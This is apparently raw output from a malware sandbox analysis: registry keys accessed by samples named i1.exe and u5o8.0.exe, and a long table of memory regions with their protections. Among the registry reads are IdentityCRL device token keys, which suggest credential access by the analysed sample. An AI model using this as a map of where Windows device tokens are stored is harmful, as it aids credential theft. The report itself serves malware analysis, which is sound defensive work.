\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
FileId
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LowerCaseLongPath
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LongPathHash
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Name
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
OriginalFileName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Publisher
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Version
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinFileVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinaryType
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProductName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProductVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LinkDate
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinProductVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
AppxPackageFullName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
AppxPackageRelativeId
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Size
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Language
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileDirectory
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProgramId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
FileId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LowerCaseLongPath
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LongPathHash
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Name
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
OriginalFileName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Publisher
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Version
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinFileVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinaryType
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProductName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProductVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LinkDate
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinProductVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
AppxPackageFullName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
AppxPackageRelativeId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Size
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Language
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Usn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018C00DCE815A29
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceId

Memdumps

Base Address
Regiontype
Protect
Malicious
3054AFE000
unkown
page readonly
52F9000
heap
page read and write
580000
heap
page read and write
1BFE000
heap
page read and write
FE4000
trusted library allocation
page read and write
7F4000
heap
page read and write
597C000
stack
page read and write
7FF477490000
trusted library allocation
page execute and read and write
2F9D2000
heap
page read and write
38C6000
heap
page read and write
4BD5000
heap
page read and write
2A3B000
unkown
page read and write
4F56000
trusted library allocation
page read and write
2EAC0150000
heap
page read and write
1A91000
heap
page read and write
A94000
heap
page read and write
CB0000
heap
page read and write
50FF000
stack
page read and write
2EAC01EE000
heap
page read and write
6C789000
unkown
page write copy
225D1000
heap
page read and write
2920000
unkown
page read and write
1BC2E000
stack
page read and write
FD90EFE000
stack
page read and write
453C000
heap
page read and write
38E9000
heap
page read and write
1BE7D000
stack
page read and write
7500000
trusted library allocation
page read and write
596E000
direct allocation
page read and write
1878852D000
heap
page read and write
7F4000
heap
page read and write
3700000
heap
page read and write
3912000
heap
page read and write
2784000
unkown
page read and write
423E000
trusted library allocation
page read and write
2FF7000
heap
page read and write
7F4000
heap
page read and write
4B0000
heap
page read and write
C8E000
heap
page read and write
2C70000
trusted library allocation
page read and write
433B000
unkown
page read and write
2596000
direct allocation
page read and write
2C8D000
unkown
page read and write
74F0000
trusted library allocation
page read and write
7FFD99C20000
trusted library allocation
page read and write
33A0000
heap
page read and write
7FFD99A3A000
trusted library allocation
page read and write
525E000
trusted library allocation
page read and write
224FE000
heap
page read and write
1878375C000
heap
page read and write
2EADA607000
heap
page read and write
2EADEF25000
heap
page read and write
2EADEE85000
heap
page read and write
10B7000
heap
page read and write
C24000
heap
page read and write
2784000
unkown
page read and write
10D0000
heap
page read and write
74C0000
trusted library allocation
page read and write
3225000
heap
page read and write
DBA000
unkown
page read and write
2E21000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
38D3000
heap
page read and write
30544FE000
unkown
page readonly
1BBDF000
stack
page read and write
3860000
heap
page read and write
1037000
heap
page read and write
3550000
heap
page read and write
8090000
trusted library allocation
page read and write
4F0D000
stack
page read and write
3717000
heap
page read and write
224F0000
heap
page read and write
64D000
heap
page read and write
222D0000
heap
page read and write
4988000
trusted library allocation
page read and write
1C5000
heap
page read and write
38B9000
heap
page read and write
18788505000
heap
page read and write
9DE000
stack
page read and write
C21000
heap
page read and write
7FF477473000
trusted library allocation
page execute read
2F71B000
heap
page read and write
2EADA0C2000
heap
page read and write
38B2000
heap
page read and write
2C46000
heap
page read and write
18783E60000
trusted library section
page readonly
2250C000
heap
page read and write
25C5000
direct allocation
page read and write
850000
heap
page read and write
2FED000
heap
page read and write
38B8000
heap
page read and write
7FFD99C60000
trusted library allocation
page read and write
6C2A1000
unkown
page execute read
5B71000
trusted library allocation
page read and write
7A8E000
stack
page read and write
191000
stack
page read and write
2F5A000
trusted library allocation
page read and write
2FE1000
trusted library allocation
page read and write
224F1000
heap
page read and write
8F8000
stack
page read and write
2636000
direct allocation
page read and write
61E01000
direct allocation
page execute read
580000
heap
page read and write
711E000
stack
page read and write
5F8000
heap
page read and write
2784000
unkown
page read and write
303D000
trusted library allocation
page read and write
4450000
unkown
page read and write
74BD000
stack
page read and write
2F671000
heap
page read and write
2BEE000
stack
page read and write
2F9E6000
heap
page read and write
448000
unkown
page execute and read and write
27B0000
heap
page read and write
A94000
heap
page read and write
10BE000
stack
page read and write
187882F0000
trusted library allocation
page read and write
3054E7E000
stack
page read and write
2F7E3000
heap
page read and write
523E000
stack
page read and write
1E0000
heap
page read and write
3054EFE000
unkown
page readonly
2EADB520000
heap
page execute and read and write
4F3A000
trusted library allocation
page read and write
D4C000
unkown
page readonly
2E63000
trusted library allocation
page read and write
49E000
stack
page read and write
C81000
heap
page read and write
1C040000
heap
page read and write
B70000
heap
page read and write
2784000
unkown
page read and write
18788461000
heap
page read and write
3734000
unkown
page read and write
5CC000
heap
page read and write
7FFD99C00000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
2FA68000
heap
page read and write
2D2C000
stack
page read and write
224ED000
heap
page read and write
2EADB142000
trusted library allocation
page read and write
400000
unkown
page readonly
370E000
stack
page read and write
2D48000
trusted library allocation
page read and write
7FF47748F000
trusted library allocation
page execute read
EFC000
heap
page read and write
2700000
trusted library allocation
page read and write
BA1000
unkown
page execute read
2662000
direct allocation
page read and write
3054F7E000
stack
page read and write
2FA40000
heap
page read and write
26A3000
direct allocation
page read and write
7FF477489000
trusted library allocation
page execute read
7FFD99A90000
trusted library allocation
page read and write
18783EA0000
trusted library section
page readonly
408000
unkown
page readonly
7FFD99B40000
trusted library allocation
page read and write
3762000
heap
page read and write
100B000
trusted library allocation
page execute and read and write
18788530000
heap
page read and write
6B330000
unkown
page readonly
FD914FE000
stack
page read and write
113F000
heap
page read and write
1045000
trusted library allocation
page execute and read and write
6CBB000
stack
page read and write
2590000
direct allocation
page read and write
269C000
direct allocation
page read and write
38DA000
heap
page read and write
6420000
trusted library allocation
page read and write
A94000
heap
page read and write
2E550000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
25BE000
direct allocation
page read and write
18788650000
remote allocation
page read and write
7FFD99A56000
trusted library allocation
page read and write
C86000
heap
page read and write
38BF000
heap
page read and write
19F9000
unkown
page readonly
6D40000
heap
page read and write
5980000
trusted library allocation
page read and write
3912000
heap
page read and write
52BB000
trusted library allocation
page read and write
262F000
direct allocation
page read and write
1A20000
heap
page read and write
2E4B000
trusted library allocation
page read and write
6FDE000
stack
page read and write
2EADEE6A000
heap
page read and write
23E0000
direct allocation
page read and write
3053A7C000
stack
page read and write
7FFD99926000
trusted library allocation
page execute and read and write
8080000
trusted library allocation
page read and write
3019000
trusted library allocation
page read and write
8050000
heap
page read and write
222A6000
heap
page read and write
18783600000
heap
page read and write
2FFC000
heap
page read and write
7FFD99AB4000
trusted library allocation
page read and write
1B25000
heap
page read and write
6CFE000
stack
page read and write
2F92D000
heap
page read and write
2F1C000
trusted library allocation
page read and write
527D000
trusted library allocation
page read and write
614000
heap
page read and write
2FCC000
trusted library allocation
page read and write
2EAC1C60000
heap
page read and write
A0E000
stack
page read and write
7190000
trusted library allocation
page read and write
187882E0000
trusted library allocation
page read and write
2E67000
trusted library allocation
page read and write
18788420000
heap
page read and write
6C404000
unkown
page read and write
2EADA5E0000
heap
page read and write
2784000
unkown
page read and write
7C8E000
stack
page read and write
82AE000
stack
page read and write
3F80000
trusted library allocation
page read and write
4DCD000
direct allocation
page read and write
2EAC0195000
heap
page read and write
18788650000
remote allocation
page read and write
3690000
heap
page read and write
2EAC1CF0000
trusted library section
page read and write
FF0000
trusted library allocation
page read and write
2784000
unkown
page read and write
18782EFF000
heap
page read and write
9E5000
heap
page read and write
268E000
stack
page read and write
2F0E000
stack
page read and write
224D5000
heap
page read and write
38C0000
heap
page read and write
599F000
trusted library allocation
page read and write
38DA000
heap
page read and write
38D1000
heap
page read and write
295C000
unkown
page read and write
61ECC000
direct allocation
page read and write
BA0000
unkown
page readonly
2ECD000
trusted library allocation
page read and write
2F784000
heap
page read and write
4DC9000
direct allocation
page read and write
2BB0000
trusted library allocation
page read and write
10D8000
heap
page read and write
49AA000
heap
page read and write
2C90000
trusted library allocation
page read and write
549000
unkown
page execute and read and write
1000000
trusted library allocation
page read and write
7FFD99A0E000
trusted library allocation
page read and write
2EADA820000
heap
page read and write
9A000
stack
page read and write
DC3000
unkown
page readonly
2784000
unkown
page read and write
417000
unkown
page execute read
187882FD000
trusted library allocation
page read and write
440C000
stack
page read and write
6341000
trusted library allocation
page read and write
2EADA5B4000
heap
page read and write
2F6A8000
heap
page read and write
38CF000
heap
page read and write
18782E94000
heap
page read and write
3837000
heap
page read and write
38C3000
heap
page read and write
3A51000
heap
page read and write
D1F000
stack
page read and write
84E000
stack
page read and write
4A3E000
stack
page read and write
2C80000
trusted library allocation
page read and write
614000
heap
page read and write
76A000
unkown
page read and write
7FFD99BBF000
trusted library allocation
page read and write
2619000
direct allocation
page read and write
3869000
heap
page read and write
C28000
heap
page read and write
75AD000
stack
page read and write
9E0000
heap
page read and write
2654000
direct allocation
page read and write
2F676000
heap
page read and write
3D71000
trusted library allocation
page read and write
2EADEAC5000
heap
page read and write
38C3000
heap
page read and write
2FF0000
unkown
page readonly
2669000
direct allocation
page read and write
2B6E000
stack
page read and write
187882C8000
trusted library allocation
page read and write
6B331000
unkown
page execute read
23D0000
unkown
page read and write
1AF7000
heap
page read and write
7510000
trusted library allocation
page read and write
224EC000
heap
page read and write
2F770000
heap
page read and write
6D03000
heap
page read and write
2F9AA000
heap
page read and write
40A000
unkown
page read and write
7FFD99D40000
trusted library allocation
page read and write
2FE9000
heap
page read and write
263E000
direct allocation
page read and write
22188000
heap
page read and write
3912000
heap
page read and write
E90000
heap
page read and write
2EADEB10000
trusted library allocation
page read and write
4B5000
heap
page read and write
23A0000
unkown
page readonly
2EAE0AF0000
trusted library allocation
page read and write
2784000
unkown
page read and write
DBC000
unkown
page read and write
2F69E000
heap
page read and write
6B5AF000
unkown
page write copy
277F000
stack
page read and write
B1F000
stack
page read and write
1878371A000
heap
page read and write
2EADA5C0000
heap
page read and write
2FE0000
unkown
page readonly
650000
heap
page read and write
224F8000
heap
page read and write
E50000
heap
page read and write
2F707000
heap
page read and write
2EADA85B000
heap
page read and write
7FFD9984D000
trusted library allocation
page execute and read and write
187882D0000
trusted library allocation
page read and write
800D000
stack
page read and write
2784000
unkown
page read and write
3912000
heap
page read and write
38D2000
heap
page read and write
1878850A000
heap
page read and write
18782EB4000
heap
page read and write
18788230000
trusted library allocation
page read and write
2D39000
trusted library allocation
page read and write
C66000
heap
page read and write
2F6D5000
heap
page read and write
4FDC000
heap
page read and write
2EADEEC4000
heap
page read and write
224E7000
heap
page read and write
7FFD99A70000
trusted library allocation
page read and write
224EB000
heap
page read and write
2BE0000
heap
page read and write
2250D000
heap
page read and write
3720000
heap
page read and write
38C5000
heap
page read and write
58BB000
stack
page read and write
2EABC7C2000
unkown
page readonly
222A2000
heap
page read and write
A4E000
stack
page read and write
2F70C000
heap
page read and write
FD92778000
stack
page read and write
6C630000
unkown
page readonly
7FFD99B20000
trusted library allocation
page read and write
4F1D000
trusted library allocation
page read and write
3009000
heap
page read and write
4BF0000
heap
page read and write
2D98000
heap
page read and write
2784000
unkown
page read and write
2B86000
heap
page read and write
22501000
heap
page read and write
2EADEECB000
heap
page read and write
22F0000
heap
page read and write
E60000
heap
page read and write
3159000
trusted library allocation
page read and write
94F000
stack
page read and write
98E000
stack
page read and write
2ED0000
trusted library allocation
page read and write
22504000
heap
page read and write
2EADA55D000
heap
page read and write
22505000
heap
page read and write
C32000
heap
page read and write
224EE000
heap
page read and write
BA0000
unkown
page readonly
3854000
heap
page read and write
4533000
unkown
page read and write
E80000
heap
page read and write
18783460000
trusted library allocation
page read and write
2F0DA000
heap
page read and write
2F914000
heap
page read and write
7FFD99C40000
trusted library allocation
page read and write
7FFD998F0000
trusted library allocation
page read and write
2EADA610000
heap
page read and write
3718000
heap
page read and write
2EADA867000
heap
page read and write
2EADA780000
trusted library section
page read and write
3912000
heap
page read and write
2F757000
heap
page read and write
3134000
trusted library allocation
page read and write
7FFD99D20000
trusted library allocation
page read and write
2B4F000
unkown
page read and write
2EADE958000
heap
page read and write
22188000
heap
page read and write
7FFD99853000
trusted library allocation
page read and write
4ACF000
stack
page read and write
60D000
heap
page read and write
187882BB000
trusted library allocation
page read and write
2EAC1BD0000
heap
page read and write
38E3000
heap
page read and write
3690000
heap
page read and write
3053FFE000
stack
page read and write
743F000
stack
page read and write
38D9000
heap
page read and write
2EAE09E0000
trusted library allocation
page read and write
2CF0000
heap
page readonly
2F7A2000
heap
page read and write
2D09000
heap
page read and write
D20000
trusted library allocation
page read and write
1C7000
heap
page read and write
22131000
heap
page read and write
30DC000
trusted library allocation
page read and write
2EADA852000
heap
page read and write
C73000
heap
page read and write
1C041000
heap
page read and write
C5B000
heap
page read and write
1022000
trusted library allocation
page read and write
38B8000
heap
page read and write
2F0E000
trusted library allocation
page read and write
C9F000
heap
page read and write
2FA7000
trusted library allocation
page read and write
49FC000
stack
page read and write
2250D000
heap
page read and write
C8A000
heap
page read and write
2EAE09D0000
trusted library allocation
page read and write
2784000
unkown
page read and write
38E9000
heap
page read and write
38C5000
heap
page read and write
187882B0000
trusted library allocation
page read and write
2EAC0380000
heap
page read and write
2F720000
heap
page read and write
33AE000
unkown
page read and write
187883AF000
trusted library allocation
page read and write
224F0000
heap
page read and write
C40000
heap
page read and write
2EADA591000
heap
page read and write
2FF2000
heap
page read and write
1AA8000
heap
page read and write
18788372000
trusted library allocation
page read and write
382F000
stack
page read and write
2784000
unkown
page read and write
C3A000
heap
page read and write
79BF000
stack
page read and write
2CB5000
trusted library allocation
page execute and read and write
18788341000
trusted library allocation
page read and write
2784000
unkown
page read and write
2D50000
trusted library allocation
page execute and read and write
C61000
heap
page read and write
224FE000
heap
page read and write
38B8000
heap
page read and write
30F5000
trusted library allocation
page read and write
88B000
heap
page read and write
528E000
stack
page read and write
2FEA000
heap
page read and write
19D000
stack
page read and write
2EAC0291000
heap
page read and write
38D7000
heap
page read and write
18788390000
trusted library allocation
page read and write
18783570000
trusted library section
page read and write
6F70000
heap
page read and write
1BF0000
heap
page read and write
2F84000
unkown
page read and write
7FF477471000
trusted library allocation
page execute read
2E35000
trusted library allocation
page read and write
526E000
trusted library allocation
page read and write
2D7E000
stack
page read and write
224E3000
heap
page read and write
5CC000
heap
page read and write
2F928000
heap
page read and write
2F6CB000
heap
page read and write
3600000
direct allocation
page read and write
712A000
stack
page read and write
2686000
direct allocation
page read and write
2784000
unkown
page read and write
31EF000
trusted library allocation
page read and write
224FF000
heap
page read and write
FBE000
stack
page read and write
23C0000
heap
page read and write
2EADA5DA000
heap
page read and write
224EC000
heap
page read and write
40A0000
trusted library allocation
page read and write
2621000
direct allocation
page read and write
2FEE000
heap
page read and write
2FD0000
heap
page read and write
18783E70000
trusted library section
page readonly
30DF000
trusted library allocation
page read and write
3B5F000
heap
page read and write
7FF477470000
trusted library allocation
page readonly
DC3000
unkown
page readonly
54CF000
stack
page read and write
2784000
unkown
page read and write
371B000
heap
page read and write
7FFD99844000
trusted library allocation
page read and write
7710000
heap
page read and write
1878836A000
trusted library allocation
page read and write
79C0000
heap
page read and write
2790000
heap
page read and write
2E59000
trusted library allocation
page read and write
22500000
heap
page read and write
2330000
heap
page read and write
722F000
heap
page read and write
38C6000
heap
page read and write
2784000
unkown
page read and write
2FA36000
heap
page read and write
3167000
trusted library allocation
page read and write
258D000
direct allocation
page read and write
7FFD99DB0000
trusted library allocation
page read and write
6DBA000
stack
page read and write
18788380000
trusted library allocation
page read and write
288F000
unkown
page read and write
FD91DFB000
stack
page read and write
311E000
stack
page read and write
224EA000
heap
page read and write
30549FE000
unkown
page readonly
2ED0000
remote allocation
page read and write
7FFD99CF0000
trusted library allocation
page execute and read and write
2FEF000
heap
page read and write
7F4000
heap
page read and write
E70000
heap
page read and write
18782E2B000
heap
page read and write
401000
unkown
page execute read
18782CD0000
heap
page read and write
DB0000
unkown
page read and write
2EADE9CA000
heap
page read and write
7FF477485000
trusted library allocation
page execute read
1B31000
heap
page read and write
270C000
stack
page read and write
2F9FF000
heap
page read and write
FD90B9B000
stack
page read and write
4ACE000
stack
page read and write
2BEF000
stack
page read and write
187882BE000
trusted library allocation
page read and write
9B000
stack
page read and write
302F000
trusted library allocation
page read and write
59A5000
trusted library allocation
page read and write
2EAC2180000
trusted library allocation
page read and write
7FFD99D90000
trusted library allocation
page execute and read and write
2EADEE3A000
heap
page read and write
5F3000
heap
page read and write
2F6D0000
heap
page read and write
5B81000
unkown
page read and write
1B90000
heap
page read and write
187882B1000
trusted library allocation
page read and write
A94000
heap
page read and write
663E000
stack
page read and write
18788537000
heap
page read and write
18788610000
trusted library allocation
page read and write
3360000
unkown
page read and write
2784000
unkown
page read and write
1280000
heap
page read and write
3234000
heap
page read and write
22AE000
stack
page read and write
2E00000
heap
page read and write
3092000
trusted library allocation
page read and write
1A1B000
unkown
page read and write
FD90FFE000
stack
page read and write
7FFD99D70000
trusted library allocation
page read and write
2784000
unkown
page read and write
220F0000
heap
page read and write
441000
unkown
page read and write
2734000
trusted library allocation
page read and write
265B000
direct allocation
page read and write
18782E00000
heap
page read and write
38CC000
heap
page read and write
18783B40000
trusted library allocation
page read and write
2EADEED7000
heap
page read and write
7FFD9985D000
trusted library allocation
page execute and read and write
38CD000
heap
page read and write
3858000
heap
page read and write
3220000
heap
page read and write
5051000
unkown
page read and write
2F60000
heap
page read and write
2D30000
trusted library allocation
page read and write
2784000
unkown
page read and write
C70000
heap
page read and write
3A51000
heap
page read and write
71E2000
heap
page read and write
3055E7E000
stack
page read and write
1E5000
heap
page read and write
30EA000
trusted library allocation
page read and write
C2C000
heap
page read and write
2726000
trusted library allocation
page read and write
2EADA54B000
heap
page read and write
3762000
heap
page read and write
30542FE000
unkown
page readonly
75A0000
trusted library allocation
page read and write
3831000
heap
page read and write
7FFD99BB7000
trusted library allocation
page read and write
2784000
unkown
page read and write
273E000
trusted library allocation
page read and write
18783713000
heap
page read and write
1BFCE000
stack
page read and write
30541F9000
stack
page read and write
7FF47748C000
trusted library allocation
page readonly
224F0000
heap
page read and write
7FFD99A37000
trusted library allocation
page read and write
2785000
unkown
page read and write
38EE000
heap
page read and write
18782E7D000
heap
page read and write
3821000
heap
page read and write
5C0000
heap
page read and write
2770000
trusted library allocation
page read and write
59AA000
trusted library allocation
page read and write
5060000
unkown
page read and write
2EAC20A4000
trusted library allocation
page read and write
2F68A000
heap
page read and write
3839000
heap
page read and write
18788380000
trusted library allocation
page read and write
2784000
unkown
page read and write
22174000
heap
page read and write
2FF5000
heap
page read and write
30556FE000
unkown
page readonly
371B000
heap
page read and write
49B0000
heap
page read and write
FD918F4000
stack
page read and write
71D2000
heap
page read and write
FD917F1000
stack
page read and write
26D0000
trusted library allocation
page execute and read and write
2EABD1FB000
unkown
page readonly
2250D000
heap
page read and write
1C4E000
stack
page read and write
6F40000
trusted library section
page read and write
2EADE944000
heap
page read and write
2EADA5F2000
heap
page read and write
720A000
heap
page read and write
7FFD99B18000
trusted library allocation
page read and write
2E4D000
heap
page read and write
2F90F000
heap
page read and write
5276000
trusted library allocation
page read and write
33C4000
unkown
page read and write
38C3000
heap
page read and write
6F9E000
stack
page read and write
C34000
heap
page read and write
7228000
heap
page read and write
3730000
unkown
page read and write
1026000
trusted library allocation
page execute and read and write
38D7000
heap
page read and write
307F000
trusted library allocation
page read and write
2784000
unkown
page read and write
7FFD99A40000
trusted library allocation
page read and write
2EAC20B1000
trusted library allocation
page read and write
31C5000
trusted library allocation
page read and write
2FF2000
heap
page read and write
40AD000
trusted library allocation
page read and write
2FAA000
stack
page read and write
DB9000
unkown
page write copy
1BD2E000
stack
page read and write
4CC6000
trusted library allocation
page read and write
783000
unkown
page readonly
319A000
